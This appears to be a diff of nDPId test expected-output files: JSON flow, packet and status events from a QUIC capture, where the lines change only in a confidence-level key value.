nupPVa0tpr\/+wGxQCug6xHyGNDxwnWnyjCwM4oE2hnNUNVujvf72\/dvTfU08lPagglVjnYIuPVm74QZYTZRFryAhxJK17r+BPfOlYKd+vVYMtivnHXjiFQVByr8k1Rcm2cpPeLXL3f+bAsmGkc4EG6HjppgudyHK+UV5oHN+m4I6LZs94OtdQcI6RUnBhsNPqFTdenognWR3FDybsz6sXPvUHez6OFefzWFvFSrz6XT7otFR8cdYGpKRwwSfHP\/PrekwOkrlmZijlypd6KXVAl4pAFkRLTGqSWHEA1LRLEvTNukH3xy5z66DEUDlFW01SciuFipPqn91VwpPL0iC6UpfNOoxnK1nHPehbzvx3A9Po2F3NnKEzfedfgajLA5\/LmaIHRmUo6B\/KmNXMWBfwWwfMwOtQ+o42gw8mnZvG2Qqex771hctyXZMqH2SJLXmmk6AtETcwF8B6jbJ768elE90Bhjm6anLtIwTYQnbLc4EH5TtLu5+uZ3DUfoYbPMOgeH4lIEDjI0kYQ+7lnl1zdIWgKe+MmglR86en4u4M1jb\/5BPspqYSJQDFVzNKI+9EnvCEh1nm4ZLP5q4L5n4Y\/OfoQNHRw1mNsvzMmZ1LR0N0nXyXURG6oysqTj3iTmd8NZXAVgqVBMCFaGWht6XT+2k4r7buSS+jBPmF7S9tGqU"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.WhatsAppFiles","breed":"Acceptable","category":"Download"},"quic": {"client_requested_server_name":"media.fmct2-1.fna.whatsapp.net","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.WhatsAppFiles","breed":"Acceptable","category":"Download"},"quic": {"client_requested_server_name":"media.fmct2-1.fna.whatsapp.net","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 00609{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":165,"packets-processed":164,"total-skipped-flows":0,"total-l4-payload-len":221400,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":104,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":104,"total-idle-flows":101,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":478,"global_ts_msec":1621503088279} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1621503088279,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621503088279,"pkt":"AAAAAAAAAAEAU0VlCABFAAViNs5AAH4RIneokEAFmWIcTtNoAbsFTmuQxP8AAB0IeGU\/mdbeLGAANwAZh+l9xBKAiSKB2OhrwN\/hzDl51JMe7JNbapPLHMOjmgDUc0Kyw120FAqWdbLajL0G7x+rThpE\/ezHsYo1+wzly8xUgAolT2BsTpI2RHGJFl7PB6kKEbj1oJ2aRfN0feK0OGTrmVtkNP9R+\/rEuFjr\/5ftbiLlMiGuS3H3QpNIn1LP4hRzRdMhEMaL4tpWijpslIEyIWPJUu7rklLDODiHtimhfIO2wkBoYI2kQY+hFw906HJDazA9cw+osFQ\/bzvopugZzilDKv1JaRYx1e4+hqHH6L6B1UH9\/T9\/HnMV2EpDa0Av+iDS3F9RRywHXZAIhY03mMeM7GrJP2Zpz4QhJct7zfEW3x535nQ0edWGlDKJvLXrTJAeOpJnOxJ1r4baAFi3DRD+vKNPYnsuGfuIY65dgPclLbLGQ0fUutzS5iBfTHGDPLr8VDoE6brnwH\/5y9mzczXm\/kEf07xeWOu\/1opIMye\/Yn9rwK9T2MMElD6rrbD6Gahnp2r9RHhIeVU09JhM9hecDnkQZ6178V6oPYtSdjz2mTGsw+LPdfT9S16RCinAfrzSX3fRQtDiS\/0lA192fRii3J2KEljzmCRknudcAIFxTdxxb9A\/G2TbmLeHepNu2Vz0i6tcgUnXVFPrdPymqw79zhx7DrjVNwDXeclunhYwL1E7tG0V3PTUnBzD7E5OrcUKHgdfHTYLI3pYV9K56ZSwrEMPYw6PdTGd6BMaZRgmv1zwBM8F3abkA+q3Zf8DmaTM4yYqUGdqKt\/rsJPP5R8bBJC\/k1fqIhjEgyfV75RWWjvPOT8vpG\/Zf\/Lwho7iMvjqjS6+1DpZLIajkAZ0nPm\/rm87HLI0cdJpxuRH1pwBLDdf8pMJ1mfSHXv93VQKMlba5U2bhfGH1Mqk7jCyOgbhoG\/iErOEjUrAiw7X6OQncJiN9Mkd\/SEm\/\/RWlqvwMLkvGjPHLC5e7V2TGXlnOhRlZBU7qILrPVNtxU7dCPtBdbxIDti1\/YRndJCIPzLPa9h2mTEfoIgDEaAE\/7UawhYqjGFuPu7cykm8DYwvbzLfyH7bht4ex13mlrd\/FiPYOE28osrwhi1PWiAzhV1qXqi4+RWmb\/5CisAguq7jYLc0h5FGHrR92KCTjSdBEZ\/DAyNwtWa8nS6w7j5Hbinu4C0ABTwJE2l7GH4ZQ9omOr49dyeQCQatUwx0VqYJSDhoVCe0TCuJntWa02NbIeePgGo8pWxM6tgM2H8YNfSNUF9avzsSRS2VyMPLnBXpk9KiQb0mc7BEeTRigvV1S+9XKWzbnd+uq94u6ElOSGdKojQAok0wFU1sgFBAgT2mV3C3\/ZQ6n6G68vFnfmO5+ZuiNec\/P1VvDC8vVIjLmaMCjrgt9+jDuswwkMDFQIciL3t4FUlUJM2MVHvkdLHSo3q+qgTRtHtpBlxLgaLGkfaorEJRtfDW1GQLecYh1sTrhehn3QcG0nR2Ih8nO3MktWlFwRqGrK\/t0Qsdsusr3bQ36R8F1tTznS8ZWGUFNDf+Lfwf1VRU+IBvCx3kULbMabelEKmImDqvXmP2zB2BjWHst539anbYbajQw\/ZgddvVcRhVSUqIpiPQ7wJ7kw9\/TtjeFcmJbCOn4TBNtXEAFcmESf+wEZSMAzbOoMV2uJojX02TEHH7lGyR4dilgOga\/fEzmhXhoDwn+0SuTYueRdcC6yi0FFtVe7SxyfJXa\/en0rOfO5K8UmxsGwQRxH4PjiJBdspE+yoKaJq6B76ZXjWQshEvVjgOi6H1dYlUSyL2zSCF"} -00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621501260783,"flow_last_seen":1621501262883,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621501261282,"flow_last_seen":1621501263382,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00750{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.WhatsAppFiles","breed":"Acceptable","category":"Download"}} +00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621501260783,"flow_last_seen":1621501262883,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621501261282,"flow_last_seen":1621501263382,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00750{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 00609{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":166,"packets-processed":165,"total-skipped-flows":0,"total-l4-payload-len":222750,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":105,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":105,"total-idle-flows":104,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":485,"global_ts_msec":1621507440293} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1621507440293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621507440293,"pkt":"AAAAAAAAAAEAU0VlCABFAAViN3ZAAH4RIc+okEAFmWIcTsysAbsFTp5qwP8AAB0IikGMkqg\/9wYANwBCbbDOkKE3I8tUrhP0019VoFQ42OGxkeSDSRfCVHVFzGS6OlWzWiT3fji2Q9e2uBbhaayYtc5E\/X007tKAEm9FuNGSPz7TI818Sttxs3ujdp1DhJh+NpZfeeSISitSIGvg2MzufhYYrAjbhnoT1XHoGCBc1rAFUoO7UMuAGYC8SYPLocVC73lmAf9DYHNSe5fUCJSAAH+oZTPgR2yZUUzLo6fywQUMulJGI+tO3nXiCpCmWVZ53dVEiIJeeIojZJHsLSZxfmkzXZWYlR6uPBugjMWutrpp3d5v3AuvY2G7Qyk4Lv7MAfdysMbwBNbNtmNdfZPJ3\/pEPVHOv\/559Dp4RvW50HvpUKtGVrDOqJeFYelmkJNmPICcqoerayf1TiCARBZAnCn0MwD3qiNb6ZcgubQ3lYbFhXEcXw4p1oo9c4om8zLGYKCC6gMxWMZoaZf19pIOW1N7yHt\/SSfp8qPr7X11LuJnuqgknnxWBGr+1wZiL2PTq482lAJ6gF5Z2f2tN3XLZipWQds6Bo6uWSETMHj4LlIoOeoO8q99yIrIxEzO\/f4j83sVtl5ErO58R6yY0ijEedgoeOZWD8SVQDMvzkmLAx1dLgYjNi3zBdewahsS63kzpEcxno1c5HXpfC65SPUfK1u9t7lKXuScst61LMT7gD4xRvgi6ny4pOwNfDlEoBJxFCoaEzFQba0SYnQmz1wlKHdeciad8aWCTIM+4CgIGyXfMd+X+XFoeu3ajcjzAF7n6JeYn14EGnQY8unzlXF4p3i93fMCw\/xlMi\/OJq\/ruw6eUXgNqb3nrxm0BR4ksvgfkB5sFTJQPZzM8zEmRDSqngasEorcI7WMz8C2mGoX59tOv7H86rOq9kc0rL9XtCb+NWplconR2ejygYELbikOOOslKugW2zA2OmoHHi2Na4MTk66Md2Uuf6WcAKyFaaQpjc\/tMudn3z3HXrJde9BcZI846R4IemkxY1\/Z3QY1XcsM91Esz8+Pxd74AMqufrPf4mE2zfMQfa4C4336cepitLI4wuJ1hBcTktGeDMWo3AxuFTPzMyx19tB4Pb+QiQvYM29oIx\/p58YHbJiRBR\/2VW0LXa2VmGF1yjBfbyTyaiW\/0aG3AMd+pDl8N8KLpVPA44wpekrJkebyMJOc8G8y2nyC0MA6L1m0olcRvwsPyg32HFyPdlugxC3gCUDIy+\/UdsTVejDWt8G3KF2zBl5z4vUQG7szc5MTIFEplmTziOxG9vpu8uPAGk3JSUOmEY\/36oGBDkAhxzxaUR5tfsiouiWurq0NGGO0Zerjexoy1X+rM8JONjVsJbya5hJGT1\/EyIrr8IuI\/DXHAAsxAOhU117x75sR1FYPo+cPS2OX2Aq2eYhfspxYNG0jwN\/TrKrZDda9AWe9Yds2HmJkKmWUnQVV7eJUFPO+7T5F\/7VpvLpDyDx3HI9ZxDJv4+lVDYmr4M7ancc8vSp1QLKUuXa\/RRdLhFE4WpkMwIllcvDn6w2IGiZvdFwwcz0o7+lWiab+FQFJvQj5W6kBnsxHpASo8358\/GjTTHB+z0Y8rY144soNEgilV0+eFQDnbygqPbwyW1XcdsOUsoU+5ncfr9q8EY2mvfVYGA2HoIRLv74rd9Hgq035d00HMutEK92GJr8ZYm+qplcEu7zCn9\/SDJP9SVZthGjepNQwhkU8gZjaxDt0kSAy5LpSeuV57eDXzlO\/myoK40cRqGjj6TY\/1mZZ4XZJntQPKWyMGIHJzxZKIYXKlVPoQnqi25JmgSDVSszE"} -00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00609{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":167,"packets-processed":166,"total-skipped-flows":0,"total-l4-payload-len":224100,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":106,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":106,"total-idle-flows":105,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":490,"global_ts_msec":1621516392616} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516392616,"flow_last_seen":1621516392616,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516392616,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1621516392616,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516392616,"pkt":"AAAAAAAAAAEAS1QMCABFAAViOJBAAH4R+wiokEAFfgNdWcQwAbsFTuapxv8AAB0IERdUk7u04\/YAAEU0aOs+L2NbS8h3vY4IEyDvx9d+UduEUSP3UFQHQG3NjO459splk2VvFwj2AOb7c4buoNQkQrDX9vOCnfv2vAKh3jO4JsUMREjT5vNEDbeeIao\/p5PHGkGHQhyZBJDceMVmmdTd\/uhtDdk+j6PWnF9UbEFtNHo58b9XyfB2nWQ06pT3ZlYQ9WK7gVb0I12TtO\/1JgOp7SeP5Djnc84cBKVneYBg230rYLPChbpIzOYDBN2v71vSy3clCOV3NHQe9++jSFmz01AIsjPo0b7oAK8pqXiYvEW7DTC9VlrG7gxRC86BUuyPkAEhQ20RdVW5Yf10xFe6ayadGDnT237OAKo\/\/+O\/LFyNHbgVfKniSrMFRiGghfY1wLG1Jv\/b0caXf12hI0LoNCqVSPEG+EnSUUM92WSb0C9QePh4RT9rbvZi\/xbgMAiaBMtltwa7agMAD0SUEyPtFV3C+8gLuPxCYmnjIpV33zbnthqAcxQlIZ2vrKiyi+KhmHrNr9GObbxxrlP9ljjIiTHt\/t7pUOT1Y8FS6S3BV52+5yFbyKd0LCCvLS6o06nay2+nbWpq3MMEnIy2ErrDasXDV\/yTFWEtS+9f7sWO92IAVmXzrxbK093nsF5MajPhwq3Yj7enMlLFnsX3TwRJhVqvSkB7sppzgxggdf79L1raj9XW8XM8V4sShlzqKJNXWgV0Ic3AYwyNJp1wBL5vRbaDded8wpXErdg1Guex9BOOifEyh8ItX4yvCdMmUa\/SxdZy7sKrylT5MXV9b5DrpfLxY20Ij14Lk6JWUcZoiy3j7yw\/ubYUYzuIFwHCLS1lok6SgHEGlrR8xjkxHY6vGzVbWVDiYYq6XgJZVyWx9Zr21JeGPGR+US5r1E4SSQfwwOWaQavhUq2zrf51HYEGZm8p9Jic3+SIN7YCHgoI4i\/tTXM\/YmMyB3h7wKOaf5t8OBGmgTLUm+k7i6hbT9r3Y7OmK2kRsbBa0dHYNr5d8T\/VGuiypPl4TtR89RXwIfmo1y65zMEsqRFLzkK6P2g287jebk7ShyfkPP1oD8ZNBDlbBORa2duW2pLxkyuhyWajEEIi5IZPiaUkWm07VY\/3CTB8jOxZ5+izKU77hZEJk0XVWc4uEb\/QQAq9sUOziToveEoxQ8lVzljsMp2uan81z84MDcopGEBneePiZuuVSoKKmRlgQlyZ2l\/7Ctf2AtaE8R8Msu4a8A0Bz498uXG67md1GQF+0zH2XGFwQZi645tPEtwFrQVnFbTEKZ8BXx7Nap4taxxtpDt5spf5pj+Cxj9r7SClNizeuJvypZINANHTovJYhzPRhqHI